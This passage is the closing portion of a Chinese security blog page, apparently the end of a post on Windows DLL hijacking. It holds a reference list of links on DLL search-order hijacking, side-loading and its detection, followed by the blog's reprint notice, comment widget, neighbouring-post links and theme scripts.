href="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows">hijacking-dlls-in-windows-lists</a><br><a target="_blank" rel="noopener" href="https://www.netspi.com/blog/technical/adversary-simulation/adaptive-dll-hijacking/">自适应DLL劫持</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/breaksoftware/article/details/8167641">DllMain中死锁问题分析</a><br><a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order">动态链接库搜索顺序</a><br><a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-CN/troubleshoot/windows-client/deployment/dynamic-link-library">什么是 DLL</a><br><a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-libraries">动态链接库</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/liubing8609/article/details/82052769">声明导出函数的方式</a><br><a target="_blank" rel="noopener" href="https://blog.51cto.com/wingeek/273929">使用.local重定向DLL 加载路径</a><br><a target="_blank" rel="noopener" href="https://msrc-blog.microsoft.com/2018/04/04/triaging-a-dll-planting-vulnerability/">对 DLL 植入漏洞进行分类</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/breaksoftware/article/details/8150476">DllMain死锁分析</a><br><a target="_blank" rel="noopener" href="https://securityintelligence.com/posts/hunting-evidence-dll-side-loading-powershell-sysmon/">使用 PowerShell 和 Sysmon 寻找 DLL 侧加载的证据</a><br><a target="_blank" rel="noopener" href="https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/privilege-escalation/untitled-2/dll-side-loading">red-team-notes-2-0</a><br><a target="_blank" rel="noopener" href="https://www.picussecurity.com/resource/blog/revil-sodinokibi-ransomware-kaseya-vsa-msp-supply-chain-attack">Kaseya MSP 供应链攻击分析</a><br><a target="_blank" rel="noopener" href="https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0">自动发现 DLL 劫持</a><br><a target="_blank" rel="noopener" href="https://github.com/XForceIR/SideLoadHunter">Sysmon-SideLoadHunter</a><br><a target="_blank" rel="noopener" href="https://attack.mitre.org/techniques/T1574/001/">DLL 搜索顺序劫持</a><br><a target="_blank" rel="noopener" href="https://attack.mitre.org/techniques/T1574/002/">DLL 侧加载</a> </p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">YangHao</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://yanghaoi.github.io/2021/09/06/dll-jie-chi/">https://yanghaoi.github.io/2021/09/06/dll-jie-chi/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">YangHao</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Windows-DLL%E5%8A%AB%E6%8C%81/">
                                    <span class="chip bg-color">Windows DLL劫持</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="qq,qzone,wechat,weibo,douban" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/valine/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'yJD2aXK8GcbXmInljhvHyB1j-gzGzoHsz',
        appKey: 'p2SkNvakylQnkba2lMvTS09d',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/10/05/webgoat-ba-chang-diao-shi-huan-jing-pei-zhi/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/8509b1add189e4272eea5a7df80740df.png" class="responsive-img" alt="Webgoat靶场调试环境配置">
                        
                        <span class="card-title">Webgoat靶场调试环境配置</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            WebGoat是OWASP组织研制出的用于进行web漏洞实验的Java靶场程序，用来说明web应用中存在的安全漏洞。本文介绍在IDEA中进行源码编译和调试的环境配置方法。
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-10-05
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83/" class="post-category">
                                    靶场环境
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/IDEA/">
                        <span class="chip bg-color">IDEA</span>
                    </a>
                    
                    <a href="/tags/Webgoat/">
                        <span class="chip bg-color">Webgoat</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/08/19/cobaltstrike-liu-liang-yin-cang-yu-an-quan-pei-zhi/">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_9/f0214927bd28ba7a980c3f49a35e65c6.png" class="responsive-img" alt="CobaltStrike流量伪装与安全配置">
                        
                        <span class="card-title">CobaltStrike流量伪装与安全配置</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            在个人实践中摸索实践中学习CobaltStrike的使用，针对CobaltStrike的流量隐藏进行了研究，主要涉及到Cloudflare的CDN配置、Nginx的反向代理以及profile的使用。分析解决在之前的实践过程中遇到的问题，弥补解决方案的不足点。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-08-19
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/" class="post-category">
                                    安全工具
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CobaltStrike/">
                        <span class="chip bg-color">CobaltStrike</span>
                    </a>
                    
                    <a href="/tags/%E6%B5%81%E9%87%8F%E4%BC%AA%E8%A3%85/">
                        <span class="chip bg-color">流量伪装</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Yang Hao&#39;s blog<br />'
            + '文章作者: YangHao<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('5'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2020</span>
            <a href="/about" target="_blank">YangHao</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">33.8k</span>&nbsp;字
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "08";
                    var startDate = "10";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已缓慢运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已缓慢运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            

			<br>
			
            <span id="showcdn" style='display:none;'>当前CDN节点: <span id="cdn">【未知】</span>&nbsp;|&nbsp;你的ip: <span id="ip">【未知】</span>&nbsp;|&nbsp;你的所在国家/地区: <span id="loc">【未知】</span></span>
            <script>
                	getCDNinfo = function() {
	$.ajax({
		url: "https://cdnjs.cloudflare.com/cdn-cgi/trace",
		success: function(data, status) {
			let areas = "Antananarivo, Madagascar - (TNR);Cape Town, South Africa - (CPT);Casablanca, Morocco - (CMN);Dar Es Salaam, Tanzania - (DAR);Djibouti City, Djibouti - (JIB);Durban, South Africa - (DUR);Johannesburg, South Africa - (JNB);Kigali, Rwanda - (KGL);Lagos, Nigeria - (LOS);Luanda, Angola - (LAD);Maputo, MZ - (MPM);Mombasa, Kenya - (MBA);Port Louis, Mauritius - (MRU);Réunion, France - (RUN);Bangalore, India - (BLR);Bangkok, Thailand - (BKK);Bandar Seri Begawan, Brunei - (BWN);Cebu, Philippines - (CEB);Chengdu, China - (CTU);Chennai, India - (MAA);Chittagong, Bangladesh - (CGP);Chongqing, China - (CKG);Colombo, Sri Lanka - (CMB);Dhaka, Bangladesh - (DAC);Dongguan, China - (SZX);Foshan, China - (FUO);Fuzhou, China - (FOC);Guangzhou, China - (CAN);Hangzhou, China - (HGH);Hanoi, Vietnam - (HAN);Hengyang, China - (HNY);Ho Chi Minh City, Vietnam - (SGN);Hong Kong - (HKG);Hyderabad, India - (HYD);Islamabad, Pakistan - (ISB);Jakarta, Indonesia - (CGK);Jinan, China - (TNA);Karachi, Pakistan - (KHI);Kathmandu, Nepal - (KTM);Kolkata, India - (CCU);Kuala Lumpur, Malaysia - (KUL);Lahore, Pakistan - (LHE);Langfang, China - (NAY);Luoyang, China - (LYA);Macau - (MFM);Malé, Maldives - (MLE);Manila, Philippines - (MNL);Mumbai, India - (BOM);Nagpur, India - (NAG);Nanning, China - (NNG);New Delhi, India - (DEL);Osaka, Japan - (KIX);Phnom Penh, Cambodia - (PNH);Qingdao, China - (TAO);Seoul, South Korea - (ICN);Shanghai, China - (SHA);Shenyang, China - (SHE);Shijiazhuang, China - (SJW);Singapore, Singapore - (SIN);Suzhou, China - (SZV);Taipei - (TPE);Thimphu, Bhutan - (PBH);Tianjin, China - (TSN);Tokyo, Japan - (NRT);Ulaanbaatar, Mongolia - (ULN);Vientiane, Laos - (VTE);Wuhan, China - (WUH);Wuxi, China - (WUX);Xi'an, China - (XIY);Yerevan, Armenia - (EVN);Zhengzhou, China - (CGO);Zuzhou, China - (CSX);Amsterdam, Netherlands - (AMS);Athens, Greece - (ATH);Barcelona, Spain - (BCN);Belgrade, Serbia - (BEG);Berlin, Germany - (TXL);Brussels, Belgium - (BRU);Bucharest, Romania - (OTP);Budapest, Hungary - (BUD);Chișinău, Moldova - (KIV);Copenhagen, Denmark - (CPH);Cork, Ireland -  (ORK);Dublin, Ireland - (DUB);Düsseldorf, Germany - (DUS);Edinburgh, United Kingdom - (EDI);Frankfurt, Germany - (FRA);Geneva, Switzerland - (GVA);Gothenburg, Sweden - (GOT);Hamburg, Germany - (HAM);Helsinki, Finland - (HEL);Istanbul, Turkey - (IST);Kyiv, Ukraine - (KBP);Lisbon, Portugal - (LIS);London, United Kingdom - (LHR);Luxembourg City, Luxembourg - (LUX);Madrid, Spain - (MAD);Manchester, United Kingdom - (MAN);Marseille, France - (MRS);Milan, Italy - (MXP);Moscow, Russia - (DME);Munich, Germany - (MUC);Nicosia, Cyprus - (LCA);Oslo, Norway - (OSL);Paris, France - (CDG);Prague, Czech Republic - (PRG);Reykjavík, Iceland - (KEF);Riga, Latvia - (RIX);Rome, Italy - (FCO);Saint Petersburg, Russia - (LED);Sofia, Bulgaria - (SOF);Stockholm, Sweden - (ARN);Tallinn, Estonia - (TLL);Thessaloniki, Greece - (SKG);Vienna, Austria - (VIE);Vilnius, Lithuania - (VNO);Warsaw, Poland - (WAW);Zagreb, Croatia - (ZAG);Zürich, Switzerland - (ZRH);Arica, Chile - (ARI);Asunción, Paraguay - (ASU);Bogotá, Colombia - (BOG);Buenos Aires, Argentina - (EZE);Curitiba, Brazil - (CWB);Fortaleza, Brazil - (FOR);Guatemala City, Guatemala - (GUA);Lima, Peru - (LIM);Medellín, Colombia - (MDE);Panama City, Panama - (PTY);Porto Alegre, Brazil - (POA);Quito, Ecuador - (UIO);Rio de Janeiro, Brazil - (GIG);São Paulo, Brazil - (GRU);Santiago, Chile - (SCL);Willemstad, Curaçao - (CUR);St. George's, Grenada - (GND);Amman, Jordan - (AMM);Baghdad, Iraq - (BGW);Baku, Azerbaijan - (GYD);Beirut, Lebanon - (BEY);Doha, Qatar - (DOH);Dubai, United Arab Emirates - (DXB);Kuwait City, Kuwait - (KWI);Manama, Bahrain - (BAH);Muscat, Oman - (MCT);Ramallah - (ZDM);Riyadh, Saudi Arabia - (RUH);Tel Aviv, Israel - (TLV);Ashburn, VA, United States - (IAD);Atlanta, GA, United States - (ATL);Boston, MA, United States - (BOS);Buffalo, NY, United States - (BUF);Calgary, AB, Canada - (YYC);Charlotte, NC, United States - (CLT);Chicago, IL, United States - (ORD);Columbus, OH, United States - (CMH);Dallas, TX, United States - (DFW);Denver, CO, United States - (DEN);Detroit, MI, United States - (DTW);Honolulu, HI, United States - (HNL);Houston, TX, United States - (IAH);Indianapolis, IN, United States - (IND);Jacksonville, FL, United States - (JAX);Kansas City, MO, United States - (MCI);Las Vegas, NV, United States - (LAS);Los Angeles, CA, United States - (LAX);McAllen, TX, United States - (MFE);Memphis, TN, United States - (MEM);Mexico City, Mexico - (MEX);Miami, FL, United States - (MIA);Minneapolis, MN, United States - (MSP);Montgomery, AL, United States - (MGM);Montréal, QC, Canada - (YUL);Nashville, TN, United States - (BNA);Newark, NJ, United States - (EWR);Norfolk, VA, United States - (ORF);Omaha, NE, United States - (OMA);Philadelphia, United States - (PHL);Phoenix, AZ, United States - (PHX);Pittsburgh, PA, United States - (PIT);Port-Au-Prince, Haiti - (PAP);Portland, OR, United States - (PDX);Queretaro, MX, Mexico - (QRO);Richmond, Virginia - (RIC);Sacramento, CA, United States - (SMF);Salt Lake City, UT, United States - (SLC);San Diego, CA, United States - (SAN);San Jose, CA, United States - (SJC);Saskatoon, SK, Canada - (YXE);Seattle, WA, United States - (SEA);St. Louis, MO, United States - (STL);Tampa, FL, United States - (TPA);Toronto, ON, Canada - (YYZ);Vancouver, BC, Canada - (YVR);Tallahassee, FL, United States - (TLH);Winnipeg, MB, Canada - (YWG);Adelaide, SA, Australia - (ADL);Auckland, New Zealand - (AKL);Brisbane, QLD, Australia - (BNE);Melbourne, VIC, Australia - (MEL);Noumea, New caledonia - (NOU);Perth, WA, Australia - (PER);Sydney, NSW, Australia - (SYD)".split(";");
			let area = data.split("colo=")[1].split("\n")[0];
			for (var i = 0; i < areas.length; i++) {
				if (areas[i].indexOf(area) != -1) {
					$("#cdn").text(areas[i]);
					$("#ip").text(data.split("ip=")[1].split("\n")[0]);
					$("#loc").text(data.split("loc=")[1].split("\n")[0]);
					break;
				}
			}
			$("#showcdn").css('display','block');
		}
	})
}
$(document).ready(function() {
	getCDNinfo();
});
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link ">














    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>






    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

	
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/materialize/materialize.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/aos/aos.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/js/matery.js"></script>


    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/others/clicklove.js" async="async"></script>
    
    

    

    

    

    

    

    
    <script src="https://cdn.jsdelivr.net/gh/yanghaoi/yanghaoi.github.io/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
